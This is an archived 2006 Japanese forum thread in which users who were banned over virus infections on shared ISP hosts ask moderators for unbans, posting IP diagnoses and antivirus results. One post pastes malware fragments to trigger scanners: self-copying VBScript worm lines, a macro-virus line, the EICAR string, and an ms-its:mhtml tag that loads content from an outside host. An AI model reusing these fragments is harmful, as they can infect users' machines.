X

□規制解除要望□ ウイルス焼き専用★1【PROXY規制中!】

■ このスレッドは過去ログ倉庫に格納されています
0311 [―{}@{}@{}-] i218-224-151-215.s02.a005.ap.plala.or.jp
垢版 |
2006/08/04(金) 20:06:53ID:QeFfMCG20
-- Your diagnosis --
 Date of issue: Fri Aug 4 19:58:07 2006
 IP Address:218.224.151.215
 RemoteHost:i218-224-151-215.s02.a005.ap.plala.or.jp
-- %ENV[Environment variable] --
 HTTP_ACCEPT_LANGUAGE : ja
 HTTP_CONNECTION : keep-alive
 HTTP_REFERER : http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4
 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
 REMOTE_ADDR : 218.224.151.215
 REMOTE_HOST : i218-224-151-215.s02.a005.ap.plala.or.jp
 REMOTE_PORT : 3181
-- DSBL --
 218.224.151.215 -> None(^-^)
-- BBQ --
 218.224.151.215 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
 218.224.151.215 -> La ROCA es la vida.(-_-)
-- Tor(an anonymizing overlay network for TCP) --
 218.224.151.215 -> None(^-^)
-- PORT CHECKING --
 PORT 80: Result:close
 PORT 1080: Result:close
 PORT 3128: Result:close
 PORT 8000: Result:close
 PORT 8080: Result:close
 PORT 8888: Result:close

「ERROR:公開PROXYからの投稿は受け付けていません!!(1) 」
が出て書き込めない状態になってしました。
宇治金時ウィルスでしょうか・・・?
0312 [―{}@{}@{}-] softbank220030180034.bbtec.net
垢版 |
2006/08/04(金) 20:37:59ID:FzxH3PiC0
-- Your diagnosis --
 Date of issue: Fri Aug 4 20:29:39 2006
 IP Address:220.30.180.34
 RemoteHost:softbank220030180034.bbtec.net
-- %ENV[Environment variable] --
 HTTP_ACCEPT_LANGUAGE : ja
 HTTP_CONNECTION : Keep-Alive
 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
 REMOTE_ADDR : 220.30.180.34
 REMOTE_HOST : softbank220030180034.bbtec.net
 REMOTE_PORT : 1671
-- DSBL --
 220.30.180.34 -> None(^-^)
-- BBQ --
 220.30.180.34 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
 220.30.180.34 -> La ROCA es la vida.(-_-)
-- Tor(an anonymizing overlay network for TCP) --
 220.30.180.34 -> None(^-^)
-- PORT CHECKING --
 PORT 80: Result:refuse
 PORT 1080: Result:refuse
 PORT 3128: Result:refuse
 PORT 8000: Result:refuse
 PORT 8080: Result:refuse
 PORT 8888: Result:refuse


ERROR:公開PROXYからの投稿は受け付けていません!!(1)と出ます
宇治金時ですかね・・・
0313名無しの報告
垢版 |
2006/08/04(金) 20:58:03ID:I196I/W70
二人ともウイルスです
http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/744
ここをよく読んでください
その後http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/757

※診断書には読めばわかると思いますが
 「ウイルスで焼かれた」とかそういった内容は書いてありません
 なので診断書のコピペをする意味はありませんので
 他の方も診断書のコピペはしないでください
 
0317 [―{}@{}@{}-] p2053-ipad201fukuhanazo.fukushima.ocn.ne.jp
垢版 |
2006/08/05(土) 09:24:04ID:2IscQsfe0
avastでスキャンしましたが検出させませんでした
0318焼プリン ★
垢版 |
2006/08/05(土) 12:54:23ID:???0
※共有アドレスでウィルス規制されている方へ※
leo-net、CATVなど共有アドレスの場合、
たとえあなたが感染していなくても同一ホストの他の方が感染しているため、
すぐに解除はできません。
念のためあなたもウイルスチェックをした上で、プロバイダさんの方へ
「他の方がウイルスに感染していること」
「そのため2ちゃんねるで規制されていること」
を伝え、何らかの対処を依頼してください。

プロバイダさんからのお返事の内容を確認して、
解除しても大丈夫かどうかを判断します。

参照
http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/344,346-347,352,354,376,384,420-424
0319 [―{}@{}@{}-] gk3.leo-net.jp
垢版 |
2006/08/05(土) 13:27:06ID:MrNer7hJ0
規制関連の関係者の皆様へ
よろしければ教えてください。
leo-netの場合、何もやらないことをユーザーへ返事しています。
この場合規制解除は永遠に無理でしょうか?それともほとぼりが冷めたと
思えた時点(たとえば半年後、一年後など)で解除ということもあり得ますか?
現状プロバイダが何もしないことを公言していますので、解除の望みはこれ以外には
考えられません。
お返事をいただければ幸いです。
0322名無しの報告
垢版 |
2006/08/05(土) 13:37:49ID:MXYu6rmM0
leo-netの形態がどんなか知らないんだが
「自社の契約ユーザがウィルス感染して個人情報タレ流しの危機にあり、
他のユーザからの通報で状況を認識してるのに注意喚起もしない」
そんな糞プロバ解約して他のISPと契約って選択肢はないのかな
0324 [―{}@{}@{}-] gk3.leo-net.jp
垢版 |
2006/08/05(土) 13:46:19ID:MrNer7hJ0
感染者を特定してからレオパに通報すれば何とかなるはずです!
8/4の20時頃に残存してたログでは一人も発見できなかったので、dat落ちスレを読めるかた、協力お願いします!
諦めたり文句を言うのは簡単だけど、諦めないかた、マジで協力をお願いします!!

半角二次元の過去ログ倉庫に行って、8/3以降に落ちたスレを全部、1-1000まで全表示できる状態で「leo-net」で検索してください。
片っ端からスレを開いて、見つかったレスのgk*.leo-net.jp、PC名、ユーザ名をリストアップする。
同一人物で複数うpされてるものは、1人としてカウントしていいと思います。
膨大なログを調べて、全てリストアップしなければいけないから骨が折れるとは思いますが。
投稿者検索とか、もっと効率のいい探し方があるんだろうけど、俺は壷もってないので詳しく知りません。
不明だけど、最低、gk3が1名以上、gk8が1名以上は感染しています。それ以外のgk*は大丈夫かも知れない。

レオパにリストを送り、「この人達が亀田ウィルスに感染しているから同一IPの人に注意を呼びかけてください」とお願いする。
やがてレオパから自分のPCに注意メールが届けば、対処しようとしてくれた証にはなる。
そこに当人達がウィルス退治したらレオパに連絡いれるように一筆入れてもらう。
リスト全員からレオパに連絡がいけば、2ちゃんに報告してもらう。これで解決すると思うけど、どうでしょう。
(これで対処してくれない時は、その時こそ文句を言っていい)
0325 [―{}@{}@{}-] i218-224-151-215.s02.a005.ap.plala.or.jp
垢版 |
2006/08/05(土) 13:52:56ID:0IEPtZSb0
ウィルス駆除にはTrendMicro社のウィルスバスターオンラインスキャンを使用しました
宇治ウィルスのファイル名は「TSPY_SUFIAGE,G」でした
お手を煩わせてしまい、誠に申し訳ありません。
0326名無しの報告
垢版 |
2006/08/05(土) 13:53:45ID:qUdlx85i0
>>322
賃貸でレオパレス21に入居したら強制的にleo-netだった
という学生さんがほとんどでFA?
自社賃貸物件とセットにして他のISPと契約という選択肢を与えないから
サービス内容で差をつけずともやっていけるという仕組み・・・ですよね、明らかに。
前回leo-net全面規制時の対応内容からいっても。
0327 [―{}@{}@{}-] gk8.leo-net.jp
垢版 |
2006/08/05(土) 13:56:31ID:wfZBMdCi0
>>324
レオパにリストを送り、「この人達が亀田ウィルスに感染しているから同一IPの人に注意を呼びかけてください」とお願いする。

レオパレス側が何もしないことを公言してるからこの時点で無理。
そもそも呼びかけが可能ならインターネットのログイン時に全員に呼びかけをして、
「レオパレス側としてはウィルス感染の注意を促しました。」→規制解除検討になるかもしれない。

いや、レオパ側が動かないからどうしようもないんだけどね。
0328 [―{}@{}@{}-] gk3.leo-net.jp
垢版 |
2006/08/05(土) 13:57:49ID:MrNer7hJ0
>>324
過去スレ検索できるのなら、去年の荒らし騒ぎを検索してみればいい。
レオネットがどんなログを取っていて、どんなログを取っていないかよくわかるよ。
俺の書き込みは「ログを取られている」ことを前提に書いているからいいんだけどさ。
>同一IPの人に注意を呼びかけてください」
私もあなたも同じIPですよ。gk3.leo-net.jp (138.243.201.1) のはずです。
もちろんプライベートアドレスは違うんだろうけど。
レオネットにちゃんとログがあって、ウイルスによるアクセスがすべて把握できて
そのユーザーの通信だけを遮断する。これだけのことを「レオネットがやると言ってくれる」
なら、2ちゃんねるは解除してくれるよ。これをレオネットに言わせないとダメなんだよ。
去年の荒らし騒ぎの時も同じだった。けど結局言わせたのは総務省関係者だったんだよ。
ユーザーの声で動くプロバイダではない。それをちゃんとわかった上で行動しないと
無駄な労力ばかりなんだ。

私は>>324さんに言いたいのではない。この書き込みはログに残しているであろう
レオネットへ向けていることだけはわかって欲しい。
議論や提案は発散させないために以下のスレでしてみないか?
そうすればみんなで統一行動がとれると思う。
◆◇◆◇◆日本leo-net共同体党◆◇◆◇◆
http://sports2.2ch.net/test/read.cgi/operatex/1126449864/l50
0331名無しの報告
垢版 |
2006/08/05(土) 15:53:17ID:0k7Dx8iT0
http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/680

680:水色@飛行石 ★:sage:2006/08/04(金) 01:58:50 ID:???0
>>677
誰かがやってくれると思わず自分で動きましょー。
1ヶ月コースで焼いてますのでー。

1ヶ月して爆撃再開したら、また焼きますのでー。


1ヶ月たったら一旦解除されるんですか?
0332名無しの報告
垢版 |
2006/08/05(土) 17:34:53ID:KPG+WVe30
>>328
今回は、荒らしの時と違って、そのユーザーを遮断とかじゃなくて、
ウィルス感染の警告と駆除をお願いするのだから、希望はありませんか?
>>318の参照を見て貰えば判りますが、その方も始めはISPに拒否されています。
でも、そのユーザーのせいではなく、警告のお願いだったので、
最後には対応して貰っています。
ISPは規制とかに関することは他のユーザーからの意見は聞いてくれないっぽいですが、
今回は又、事情が違うと思いますが、一度やってみる価値はありませんか?
0334焼プリン ★
垢版 |
2006/08/05(土) 17:38:59ID:???0
>>319
現時点では何とも言えません。

>>331
一ヶ月焼きで様子をみて
爆撃再開→永久焼きになる可能性もあるって事かと。
0336 [―{}@{}@{}-] gk3.leo-net.jp
垢版 |
2006/08/06(日) 02:07:25ID:UVWiI39/0
今日、俺が丁寧な口調で警告出すようお願いしておいたから
2〜3日様子みてくれ。
0337名無しの報告
垢版 |
2006/08/06(日) 02:41:12ID:YO9Fxw7G0
http://live14.2ch.net/test/read.cgi/liveplus/1154796117/

ここのスレをクリックするとウイルス検出されるぞ
なんなんこれw意味わからん こんなの初めてだ


sage ms-its:mhtml:file://c:\[ これが原因?
0338名無しの報告
垢版 |
2006/08/06(日) 02:46:29ID:YO9Fxw7G0
あーーーー 
上記のsage re 張ったらここも検出された

スマソ・・・・・・・・
0339名無しの報告
垢版 |
2006/08/06(日) 02:48:00ID:X5tNVR7V0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))  
0341 ◆rukh93uu8g
垢版 |
2006/08/06(日) 10:16:13ID:0qaQEay50
2人も駆除してくださったという収穫。
再発したらまた対応できるんじゃないでしょうか。
解除することで、荒らされるかもしれないスレ、
対応していただけなければならないRockerさん、etc
多くの方にご迷惑を掛けることも、そりゃあるかもしれないですが。

そういうことに細かく対応できるための人海戦術なんじゃないかなっと。

#あくまで単なる野次馬として。
0342名無しの報告
垢版 |
2006/08/06(日) 10:18:45ID:Pi1TcAW10
一応転載
http://qb5.2ch.net/test/read.cgi/sec2chd/1154777583/48

48 生姜焼き ★ sage 2006/08/06(日) 10:01:41 ID:???0 @
とはいっても確かに「少なくとも2人はいる」のは確認してるけど
3人目がいるかどうかはわからないんですよね

さて、どうしましょ?>焼きのみなさん
0343七宝焼 ★
垢版 |
2006/08/06(日) 10:22:58ID:???0
> asf-cable.c-able.ne.jpのみなさま
一応解除しましたが、再発した場合は再び焼きますので、
それだけはご承知下さい。
0344 [―{}@{}@{}-] asf-cable.c-able.ne.jp
垢版 |
2006/08/06(日) 10:25:14ID:gWxM9SNP0
>>340の続きということで見てください

解除要請の理由といたしましては
・感染者リストの2人のウイルス駆除が完了したこと
・3人目の感染者がいるという根拠がないこと
・プロバイダ側で感染者を特定したとしても リストを手がかりにするため リストの2人以外の感染者を特定することは不可能なこと
・今回規制されたのは この2人の感染が確認されたためだということ
・3人目の感染者の存在を疑う場合 他の規制されてないホストのことはどうなるのか キリがない
の点です


>>343
解除されたようですね
ありがとうございます
0345asf-cable.c-able.ne.jp
垢版 |
2006/08/06(日) 10:30:58ID:gWxM9SNP0
これで後は30分ぐらい待てばスレに書き込めるようになるのかな…?
0347asf-cable.c-able.ne.jp
垢版 |
2006/08/06(日) 10:40:44ID:gWxM9SNP0
まだ解除がすべてには行き届いてないようです
0348名無しの報告
垢版 |
2006/08/06(日) 10:42:36ID:Pi1TcAW10
全鯖に浸透するには、時間差がありますのでしばしお待ちを。
0350 [―{}@{}@{}-] gk3.leo-net.jp
垢版 |
2006/08/06(日) 13:09:00ID:UVWiI39/0
お客様

平素は大変お世話になっております。
レオパレス21ブロードバンド事務局 河上と申します。
お問合せ頂きました件につきましてご回答申し上げます。

お客様ご申告の件に関しまして弊社にて状況の確認を
させて頂きますので、今しばらくお待ち下さいませ。
なお、状況によりお時間がかかる場合がございますので
予めご了承の程宜しくお願い致します。

ご不明な点は下記コールセンターまでお問い合わせをお願い致します。
今後ともレオパレス21を何卒宜しくお願い申し上げます。


これってウイルス所持者の調査をして対応してくれるってことでFA?
0351水色@飛行石 ★
垢版 |
2006/08/06(日) 14:33:00ID:???0
>>350
ちょっと解除してみましたー。
暫くたったら浸透すると思いますー。
0352gk3.leo-net.jp
垢版 |
2006/08/06(日) 15:44:58ID:UVWiI39/0
ありがとうございました
0354gk3.leo-net.jp
垢版 |
2006/08/06(日) 15:53:31ID:UVWiI39/0
>>351
同じく規制中の「gk8.leo-net.jp」は解除になりましたでしょうか?
同じレオネットとして気になっております。leo-net.jp全体の解除なのか
それともgk3だけの解除なのか、よろしければ教えてください。
0355名無しの報告
垢版 |
2006/08/06(日) 15:55:56ID:UVWiI39/0
それはgk8のホスト名で>>350と同じような返答貰うまで無理なんじゃないかねぇ
0360 [―{}@{}@{}-] gk8.leo-net.jp
垢版 |
2006/08/06(日) 18:01:10ID:K6IAF/J+0
まだ書けませんけど・・・
0362 [―{}@{}@{}-] vip1.lcv.ne.jp
垢版 |
2006/08/06(日) 19:00:59ID:iHahDXEO0
-- Your diagnosis --
 Date of issue: Sun Aug 6 19:00:10 2006
 IP Address:202.122.192.129
 RemoteHost:vip1.lcv.ne.jp
-- %ENV[Environment variable] --
 HTTP_ACCEPT_LANGUAGE : ja
 HTTP_CONNECTION : Keep-Alive
 HTTP_REFERER : http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rls=GGLG,GGLG:2006-16,GGLG:ja&q=%E9%A2%A8%E5%91%82%E6%95%B7%E3%80%80%E7%A2%BA%E8%AA%8D
 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 REMOTE_ADDR : 202.122.192.129
 REMOTE_HOST : vip1.lcv.ne.jp
 REMOTE_PORT : 36304
-- DSBL --
 202.122.192.129 -> None(^-^)
-- BBQ --
 202.122.192.129 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
 202.122.192.129 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
 202.122.192.129 -> None(^-^)
-- PORT CHECKING --
 PORT 80: Result:refuse
 PORT 1080: Result:refuse
 PORT 3128: Result:refuse
 PORT 8000: Result:refuse
 PORT 8080: Result:refuse
 PORT 8888: Result:refuse

金曜日からだめなんですが・・・
とりあえず第一には自らのウイルスチェックですなあ
0364gk8.leo-net.jp
垢版 |
2006/08/06(日) 20:34:32ID:K6IAF/J+0
>>361
書き込めました。
ありがとうございました。
0365 [―{}@{}@{}-] onetgw.cs-k.bias.ne.jp
垢版 |
2006/08/06(日) 21:02:13ID:QhrAzfPu0
山田チェッカーウイルスにやられました。
AVGと手動にて、ウイルス(ウイルスネーム;Trojan horse Generic.YRK)削除&
レジストリ修復をしました。規制解除をして頂けますでしょうか。
0367gk8.leo-net.jp
垢版 |
2006/08/06(日) 22:36:46ID:K6IAF/J+0
解除されました。
ありがとうございます。
0368 [―{}@{}@{}-] vip1.lcv.ne.jp
垢版 |
2006/08/07(月) 03:32:54ID:6MBlvdQU0
>>235ということは解除していただけるのでしょうか?
当方CATVの共有ホストで8/4からウイルス焼きされています
0370reffi@報告人 ★
垢版 |
2006/08/07(月) 03:36:14ID:???0
株式会社レオパレス21様より書き込みできないとの連絡がありました。
それで返答しようと思ったのですがウィルス焼きされた日時を確認
出来ませんでしたのでご存じの方がいらっしゃいましたらよろしく
お願いします。
0371軍艦焼 ★
垢版 |
2006/08/07(月) 04:51:38ID:???0
>>370 ログでは以下の通り残ってました。
gk8.leo-net.jp 2006/08/04(Fri) 02:24:30
gk3.leo-net.jp 2006/08/03(Thu) 22:12:36
#今は解除済み
0372 [―{}@{}@{}-] white1.scn-net.ne.jp
垢版 |
2006/08/07(月) 07:31:32ID:P1DysGty0
-- Your diagnosis --
 Date of issue: Mon Aug 7 07:30:02 2006
 IP Address:219.117.176.253
 RemoteHost:white1.scn-net.ne.jp
-- %ENV[Environment variable] --
 HTTP_ACCEPT_LANGUAGE : ja
 HTTP_CONNECTION : Keep-Alive
 HTTP_REFERER : http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4
 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 REMOTE_ADDR : 219.117.176.253
 REMOTE_HOST : white1.scn-net.ne.jp
 REMOTE_PORT : 43987
-- DSBL --
 219.117.176.253 -> None(^-^)
-- BBQ --
 219.117.176.253 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
 219.117.176.253 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
 219.117.176.253 -> None(^-^)
-- PORT CHECKING --
 PORT 80: Result:refuse
 PORT 1080: Result:refuse
 PORT 3128: Result:refuse
 PORT 8000: Result:refuse
 PORT 8080: Result:refuse
 PORT 8888: Result:refuse

ERROR:公開PROXYからの投稿は受け付けていません!!(1)と出ます
0373名無しの報告
垢版 |
2006/08/07(月) 07:54:35ID:DoknWcv2O
診断書をむやみに貼る人は、
スレをまるで読んでないとみなされスルーされます。
0374 [―{}@{}@{}-] white1.scn-net.ne.jp
垢版 |
2006/08/07(月) 08:13:55ID:P1DysGty0
>>372です。
2日前から書き込みが出来なくなりました。
【DSBL】PROXY規制中!【報告無用】のスレを見ても何がなんだか分からなくて・・・。
ウイルススキャンしたところウイルスは検出されていませんでした。
ケーブル系なんですが、ブロバイダに相談すれば解除できるのでしょうか?
0375 [―{}@{}@{}-] onetgw.cs-k.bias.ne.jp
垢版 |
2006/08/07(月) 15:15:33ID:A/Ksdgq10
4日ほど前に山田チェッカーウイルスにやられました。
AVGと手動にて、ウイルス(ウイルスネーム;Trojan horse Generic.YRK)削除&
レジストリ修復をしました。規制解除をして頂けますでしょうか。
0376reffi@報告人 ★
垢版 |
2006/08/07(月) 17:04:59ID:???0
湘南ケーブルネットワーク様より書き込み規制についての問い合わせが
ありました。
ウィルス焼きの原因のログが見つかりませんでしたのでご存じの方が
いらっしゃいましたらよろしくお願いします。
0377 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 17:19:25ID:pndSP2rP0
さきほどふしあなで書き込もうとしたら連投規制が出ました
ウイルススキャンしたら書き込めるようになりました。
愛媛catvは私が原因でしょうか?
ウイルスは、newsvip、マカフィーで削除しました
0378名無しの報告
垢版 |
2006/08/07(月) 17:44:01ID:7dPMGoIK0
>>376
これかな?

http://halcyan.30.kg/klist/list.php?filepattern=-106-8-&kwd_sv=&kwd_host=scn-net.ne.jp
sakura02.bbspink.com 2006/08/04(金) 00:06:31 white1.scn-net.ne.jp

http://halcyan.30.kg/klist/list.php?filepattern=-106-7-&kwd_sv=&kwd_host=scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 02:08:20 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:21:05 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:19:21 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:19:17 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:08:21 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:08:10 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:07:49 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:58:48 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:53:57 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:49:51 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:46:08 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:45:15 white1.scn-net.ne.jp

http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/94
white2.scn-net.ne.jp 18res

http://sakura03.bbspink.com/test/read.cgi/ascii2d/1129185674/950,958,968
white5.scn-net.ne.jp

ログ5G超えてた・・おrz
0379名無しの報告
垢版 |
2006/08/07(月) 17:48:06ID:7dPMGoIK0
>>378補足
虹のポストは全部追っていません。
一部かも
0381 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 19:49:21ID:pndSP2rP0
ip family.e-catv.ne.jp   219.109.48.4で規制を受けたのは私のようです。
2ちゃんのせんぶらの過去ログに感染していたようです、ノートン先生で検出して削除しました。
WScript.KakWorm Bloodhound.Exploit.6 Macro.src  Unix.Penguin
4つのウイルスが出ました。
一応これで問題解決したようなので、規制解除をお願いしたいのですが・・・
0382名無しの報告
垢版 |
2006/08/07(月) 20:17:10ID:QirugsGQ0
それいわゆる「ウイルスコード」に反応しただけじゃ?
0384 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 20:29:39ID:pndSP2rP0
さっきはマカフィーでも3つ引っかかったんですよ
それに別のところ規制スレで私が任意でつけたIPが乗ってたんですよ

687 名前:AirRock ★ 投稿日:2006/08/06(日) 18:38:40 ???0
お願いします。
comic6 2006/08/06(日) 14:47:38〜18:30:00
共有
family.e-catv.ne.jp   219.109.48.4
689 名前:生姜焼き ★ 投稿日:2006/08/06(日) 18:56:26 ???0
>>687
全部焼きましたー


※family.e-catv.ne.jpは共有とはいえ多いので焼きました
参考
http://halcyan.30.kg/klist/list.php?filepattern=106-8&kwd_sv=comic6&kwd_host=family.e-catv.ne.jp
0385名無しの報告
垢版 |
2006/08/07(月) 20:40:32ID:QirugsGQ0
>>384
あなたのIPは共有ですから
たくさんの人が同じものを使っています
0386 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 20:45:06ID:pndSP2rP0
>>385
リモートホストとは別の219.109.48.4はうちのルータをいじってかえたものなんですが・・・
ウイルス爆撃相談所にはそのipが張られていたんですよ
一応、ノートントラップだけでなく、マカフィーでも3つファイルが出たんで・・・
0387名無しの報告
垢版 |
2006/08/07(月) 20:48:03ID:QirugsGQ0
あなたはもっとご自分のネット環境について知識を実に付けた方がよい
family.e-catv.ne.jpというリモホを変えられるなら今ここで変えてみなさい
0389名無しの報告
垢版 |
2006/08/07(月) 20:55:16ID:QirugsGQ0
>>386
あと family.e-catv.ne.jp  ←リモートホスト
    219.109.48.4     ←IP

ただ変換しただけだから

参考 ttp://www.ghiblies.net/cgi-bin/host/
0390 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 20:56:26ID:pndSP2rP0
まあ、問題ないなら別にいいです
マクァフィーのほうもノートンと同じところから検出しましたし
つまり規制の場合はリモホからしか解らんのですな。
個々のルータで設定しているアドレスは関係なしで
0391名無しの報告
垢版 |
2006/08/07(月) 20:58:50ID:QirugsGQ0
で2chの過去ログのとこにあるってのは今回のウイルスとは全く無関係です
>>382-383の通りです
0392 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 20:59:42ID:pndSP2rP0
そうでした、ルータで変えれるやつはグローバルipとか言うのに変えたんでした、忘れてました。
お手数かけました。どうも。
では愛媛catvに抗議してきます
0393 [―{}@{}@{}-] family.e-catv.ne.jp
垢版 |
2006/08/07(月) 21:58:11ID:pndSP2rP0
>>392
頼みましたぞ・・・早く・・・規制解除・・・を・・・
0394名無しの報告
垢版 |
2006/08/07(月) 22:05:31ID:71KPgkt80?DIA(34444)
>>393
あなたもしなさいよ
抗議するユーザーが多ければ、それだけ対応が早まるでしょ
0396 [―{}@{}@{}-] tky3-p95.flets.hi-ho.ne.jp
垢版 |
2006/08/07(月) 22:48:10ID:BQF8uOcZ0
ボスケテ
0397 [―{}@{}@{}-] kctv58069.ccnw.ne.jpn
垢版 |
2006/08/07(月) 22:54:16ID:EVGqqBO90?2BP(0)
-- Your diagnosis --
 Date of issue: Mon Aug 7 22:41:16 2006
 IP Address:219.124.202.69
 RemoteHost:kctv58069.ccnw.ne.jp
-- %ENV[Environment variable] --
 HTTP_ACCEPT_LANGUAGE : ja
 HTTP_CONNECTION : Keep-Alive
 HTTP_REFERER : http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4
 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
 HTTP________________ : ~~~~~ ~~~~~~~
 REMOTE_ADDR : 219.124.202.69
 REMOTE_HOST : kctv58069.ccnw.ne.jp
 REMOTE_PORT : 1881
-- DSBL --
 219.124.202.69 -> None(^-^)
-- BBQ --
 219.124.202.69 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
 219.124.202.69 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
 219.124.202.69 -> None(^-^)
-- PORT CHECKING --
 PORT 80: Result:refuse
 PORT 1080: Result:refuse
 PORT 3128: Result:refuse
 PORT 8000: Result:refuse
 PORT 8080: Result:refuse
 PORT 8888: Result:refuse

山田ウィルス治しました。
よろしくお願いします。
0398名無しの報告
垢版 |
2006/08/07(月) 22:58:55ID:KmmGKKOP0
>>397
つ【テンプレ】
・名前欄に「fusianasan」と入れてあなたのホストを表示
  ・使用したアンチウィルスソフトorサービス(無論、ウイルス定義は最新で)
  ・ウィルス定義のエンジンバージョン・DATバージョン
  ・見つかった(駆除した)ウィルスの名称
0399生姜焼き ★
垢版 |
2006/08/07(月) 23:01:39ID:???0
診断書をむやみに貼る人はうんぬん
0400名無しの報告
垢版 |
2006/08/07(月) 23:07:22ID:p1V4v5OP0
>>398に追加
診断書をコピペして貼った場合は、スレを全く読んでいないものとみなされて
対応されません(>>274 >>313-314 >>399
要するに、診断書を貼る=「対処しなくて構いません」と書いたのと同じ

共有IP云々と言われた場合は>>318
0401 [―{}@{}@{}-] kctv58069.ccnw.ne.jpn
垢版 |
2006/08/07(月) 23:11:50ID:EVGqqBO90?2BP(0)
>>397
本当に申し訳ございませんでした。
クリーンインストールしましたので、もう大丈夫です。
感染ファイル元は「山田ウィルスチェッカー.exe」
ウィルス名は「Backdoor.Trojan」(Norton AntiVirus 2005で確認しました。)
ウィルス定義ファイルは2006/08/03です。
0404生姜焼き ★
垢版 |
2006/08/07(月) 23:29:01ID:???0
kctv58069.ccnw.ne.jpさん、

解除しました

全板に書けるようになるまではもうしばらくかかります
のんびりお茶でも飲んでもうちょっと待っててください
0405reffi@報告人 ★
垢版 |
2006/08/08(火) 00:08:56ID:???0
>378
どうもです〜
0406 [―{}@{}@{}-] 61-205-116-3.eonet.ne.jp
垢版 |
2006/08/08(火) 02:59:26ID:fRgEsHCM0
カスペルスキー オンラインスキャナ
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.78.0
感染: Backdoor.Win32.Delf.afu
削除しました
0408 [―{}@{}@{}-] softbank218115254027.bbtec.net
垢版 |
2006/08/08(火) 11:24:28ID:nLPiZohp0
使用したアンチウィルスソフト:ウイルスバスター2006
ウィルスの名称:
TSPY_LINEAGE.UE
HTML_CRINET.A

ウイルス隔離
ウイルスが見つかった感染ファイルが、隔離フォルダに移動されました。
隔離されたファイルは、そのまま放置しても問題ありません。

と、出ました。

それと、半角二次のみにウイルスの影響が有るのでしたら、
半角二次以外の規制はどうにかならないのでしょうか?
個人的に、21歳でもないので他の板に書き込みたいのですが…。
再発の恐れがあるのでしたら、半角二次のみに規制を入れてくれませんか?
ついでに答えて下されば光栄で御座います。
